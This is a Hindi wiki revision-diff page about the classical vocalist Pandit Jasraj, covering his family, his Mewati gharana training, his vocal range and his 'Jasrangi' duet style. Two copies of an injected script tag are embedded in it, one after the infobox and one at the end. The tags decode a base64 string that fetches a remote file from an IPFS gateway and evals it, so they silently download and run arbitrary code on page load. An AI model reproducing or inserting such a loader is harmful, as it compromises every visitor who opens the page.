Difference between revisions of "पंडित जसराज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 33: Line 33:
  
 
==जीवन परिचय==
 
==जीवन परिचय==
पंडित जसराज का जन्म 28 जनवरी 1930 को एक ऐसे परिवार में हुआ जिसे 4 पीढ़ियों तक हिन्दुस्तानी शास्त्रीय संगीत को एक से बढ़कर एक शिल्पी देने का गौरव प्राप्त है। उनके पिताजी पंडित मोतीराम जी स्वयं [[मेवाती घराना|मेवाती घराने]] के एक विशिष्ट [[संगीतज्ञ]] थे। जैसा कि आपने पहले पढ़ा कि पं. जसराज को संगीत की प्राथमिक शिक्षा अपने पिता से ही मिली परन्तु जब वे मात्र 3 वर्ष के थे, प्रकृति ने उनके सर से पिता का साया छीन लिया। पंडित मोतीराम जी का देहांत उसी दिन हुआ जिस दिन उन्हें [[हैदराबाद]] और बेरार के आखिरी निज़ाम उस्मान अली खाँ बहादुर के दरबार में राज [[संगीतज्ञ]] घोषित किया जाना था। उनके बाद परिवार के लालन-पालन का भार संभाला उनके बडे़ सुपुत्र अर्थात् पं० जसराज के अग्रज, संगीत महामहोपाध्याय पं० मणिराम जी ने। इन्हीं की छत्रछाया में पं० जसराज ने संगीत शिक्षा को आगे बढ़ाया तथा [[तबला]] वादन सीखा। मणिराम जी अपने साथ बालक जसराज को [[तबला वादक]] के रूप में ले जाया करते थे। परंतु उस समय सारंगी वादकों की तरह तबला वादकों को भी क्षुद्र माना जाता था तथा 14 वर्ष की किशोरावस्था में इस प्रकार के निम्न बर्ताव से अप्रसन्न होकर जसराज ने तबला त्याग दिया और प्रण लिया कि जब तक वे शास्त्रीय गायन में विशारद प्राप्त नहीं कर लेते, अपने बाल नहीं कटवाएँगे। इसके पश्चात् उन्होंने मेवाती घराने के दिग्गज महाराणा जयवंत सिंह वाघेला से तथा [[आगरा]] के स्वामी वल्लभदास जी से संगीत विशारद प्राप्त किया। पंडित जी के परिवार में उनकी पत्नी मधु जसराज, पुत्र सारंग देव और पुत्री दुर्गा हैं।   
+
पंडित जसराज का जन्म 28 जनवरी 1930 को एक ऐसे परिवार में हुआ जिसे 4 पीढ़ियों तक हिन्दुस्तानी शास्त्रीय संगीत को एक से बढ़कर एक शिल्पी देने का गौरव प्राप्त है। उनके पिताजी पंडित मोतीराम जी स्वयं [[मेवाती घराना|मेवाती घराने]] के एक विशिष्ट [[संगीतज्ञ]] थे। जैसा कि आपने पहले पढ़ा कि पं. जसराज को संगीत की प्राथमिक शिक्षा अपने पिता से ही मिली परन्तु जब वे मात्र 3 वर्ष के थे, प्रकृति ने उनके सर से पिता का साया छीन लिया। पंडित मोतीराम जी का देहांत उसी दिन हुआ जिस दिन उन्हें [[हैदराबाद]] और बेरार के आखिरी निज़ाम उस्मान अली खाँ बहादुर के दरबार में राज [[संगीतज्ञ]] घोषित किया जाना था। उनके बाद परिवार के लालन-पालन का भार संभाला उनके बडे़ सुपुत्र अर्थात् पं० जसराज के अग्रज, संगीत महामहोपाध्याय पं० मणिराम जी ने। इन्हीं की छत्रछाया में पं० जसराज ने संगीत शिक्षा को आगे बढ़ाया तथा [[तबला]] वादन सीखा। मणिराम जी अपने साथ बालक जसराज को [[तबला वादक]] के रूप में ले जाया करते थे। परंतु उस समय [[सारंगी वादक|सारंगी वादकों]] की तरह तबला वादकों को भी क्षुद्र माना जाता था तथा 14 वर्ष की किशोरावस्था में इस प्रकार के निम्न बर्ताव से अप्रसन्न होकर जसराज ने तबला त्याग दिया और प्रण लिया कि जब तक वे शास्त्रीय गायन में विशारद प्राप्त नहीं कर लेते, अपने बाल नहीं कटवाएँगे। इसके पश्चात् उन्होंने मेवाती घराने के दिग्गज महाराणा जयवंत सिंह वाघेला से तथा [[आगरा]] के स्वामी वल्लभदास जी से संगीत विशारद प्राप्त किया। पंडित जी के परिवार में उनकी पत्नी मधु जसराज, पुत्र सारंग देव और पुत्री दुर्गा हैं।   
 
====आवाज़ की विशेषता====
 
====आवाज़ की विशेषता====
पं० जसराज के आवाज़ का फैलाव साढ़े तीन सप्तकों तक है। उनके गायन में पाया जाने वाला शुद्ध उच्चारण और स्पष्टता मेवाती घराने की '[[ख़याल]]' शैली की विशिष्टता को झलकाता है। उन्होंने बाबा श्याम मनोहर गोस्वामी महाराज के सानिध्य में 'हवेली संगीत' पर व्यापक अनुसंधान कर कई नवीन बंदिशों की रचना भी की है। भारतीय शास्त्रीय संगीत में उनका सबसे महत्त्वपूर्ण योगदान है। उनके द्वारा अवधारित एक अद्वितीय एवं अनोखी जुगलबन्दी, जो 'मूर्छना' की प्राचीन शैली पर आधारित है। इसमें एक महिला और एक पुरुष गायक अपने-अपने सुर में भिन्न [[राग यमन (कल्याण)|रागों]] को एक साथ गाते हैं। पंडित जसराज के सम्मान में इस जुगलबन्दी का नाम 'जसरंगी' रखा गया है।  
+
पं० जसराज के आवाज़ का फैलाव साढ़े तीन सप्तकों तक है। उनके गायन में पाया जाने वाला शुद्ध उच्चारण और स्पष्टता मेवाती घराने की '[[ख़याल]]' शैली की विशिष्टता को झलकाता है। उन्होंने बाबा श्याम मनोहर गोस्वामी महाराज के सानिध्य में 'हवेली संगीत' पर व्यापक अनुसंधान कर कई नवीन बंदिशों की रचना भी की है। भारतीय शास्त्रीय संगीत में उनका सबसे महत्त्वपूर्ण योगदान है। उनके द्वारा अवधारित एक अद्वितीय एवं अनोखी जुगलबन्दी, जो 'मूर्छना' की प्राचीन शैली पर आधारित है। इसमें एक महिला और एक पुरुष गायक अपने-अपने सुर में भिन्न [[राग यमन (कल्याण)|रागों]] को एक साथ गाते हैं। पंडित जसराज के सम्मान में इस जुगलबन्दी का नाम 'जसरंगी' रखा गया है।
  
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==

Revision as of 11:39, 13 October 2012

pandit jasaraj
poora nam pandit jasaraj
janm 28 janavari 1930
janm bhoomi banaras
pati/patni madhu jasaraj
santan putr sarang dev aur putri durga
karm-kshetr shastriy gayak
puraskar-upadhi padm shri, padm bhooshan, padm vibhooshan
vishesh yogadan inake dvara avadharit ek advitiy evan anokhi jugalabandi, jo 'moorchhana' ki prachin shaili par adharit hai. isamean ek mahila aur ek purush gayak apane-apane sur mean bhinn ragoan ko ek sath gate haian.
nagarikata bharatiy
any janakari pandit jasaraj ne baba shyam manohar gosvami maharaj ke sanidhy mean 'haveli sangit' par vyapak anusandhan kar kee navin bandishoan ki rachana bhi ki hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pandit jasaraj (aangrezi:Pt. Jasraj) bharatiy shastriy sangit ke vishvavikhyat gayak hai. hamare desh mean shastriy sangit kala sadiyoan se chali a rahi hai. is kala ko n keval manoranjan ka, apitu eeshvar se ju dane ka ek mahattvapoorn srot mana gaya hai. aise hi ek avaz jinhoanne matr 3 varsh ki alpayu mean kathor vastavikataoan ki is thandi duniya mean apane divangat pita se virasat ke roop mean mile keval sat svaroan ke sath qadam rakha, aj vahi sat svar unaki pratibha ka indradhanush ban vishv-jagat mean unhean vikhyat kar rahe haian.

jivan parichay

pandit jasaraj ka janm 28 janavari 1930 ko ek aise parivar mean hua jise 4 pidhiyoan tak hindustani shastriy sangit ko ek se badhakar ek shilpi dene ka gaurav prapt hai. unake pitaji pandit motiram ji svayan mevati gharane ke ek vishisht sangitajn the. jaisa ki apane pahale padha ki pan. jasaraj ko sangit ki prathamik shiksha apane pita se hi mili parantu jab ve matr 3 varsh ke the, prakriti ne unake sar se pita ka saya chhin liya. pandit motiram ji ka dehaant usi din hua jis din unhean haidarabad aur berar ke akhiri nizam usman ali khaan bahadur ke darabar mean raj sangitajn ghoshit kiya jana tha. unake bad parivar ke lalan-palan ka bhar sanbhala unake bade़ suputr arthath pan0 jasaraj ke agraj, sangit mahamahopadhyay pan0 maniram ji ne. inhian ki chhatrachhaya mean pan0 jasaraj ne sangit shiksha ko age badhaya tatha tabala vadan sikha. maniram ji apane sath balak jasaraj ko tabala vadak ke roop mean le jaya karate the. parantu us samay sarangi vadakoan ki tarah tabala vadakoan ko bhi kshudr mana jata tha tatha 14 varsh ki kishoravastha mean is prakar ke nimn bartav se aprasann hokar jasaraj ne tabala tyag diya aur pran liya ki jab tak ve shastriy gayan mean visharad prapt nahian kar lete, apane bal nahian katavaeange. isake pashchath unhoanne mevati gharane ke diggaj maharana jayavant sianh vaghela se tatha agara ke svami vallabhadas ji se sangit visharad prapt kiya. pandit ji ke parivar mean unaki patni madhu jasaraj, putr sarang dev aur putri durga haian.

avaz ki visheshata

pan0 jasaraj ke avaz ka phailav sadhe tin saptakoan tak hai. unake gayan mean paya jane vala shuddh uchcharan aur spashtata mevati gharane ki 'khayal' shaili ki vishishtata ko jhalakata hai. unhoanne baba shyam manohar gosvami maharaj ke sanidhy mean 'haveli sangit' par vyapak anusandhan kar kee navin bandishoan ki rachana bhi ki hai. bharatiy shastriy sangit mean unaka sabase mahattvapoorn yogadan hai. unake dvara avadharit ek advitiy evan anokhi jugalabandi, jo 'moorchhana' ki prachin shaili par adharit hai. isamean ek mahila aur ek purush gayak apane-apane sur mean bhinn ragoan ko ek sath gate haian. pandit jasaraj ke samman mean is jugalabandi ka nam 'jasarangi' rakha gaya hai.

samman aur puraskar

pandit jasaraj niche diye gaye samman aur puraskaroan se sammanit ho chuke haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>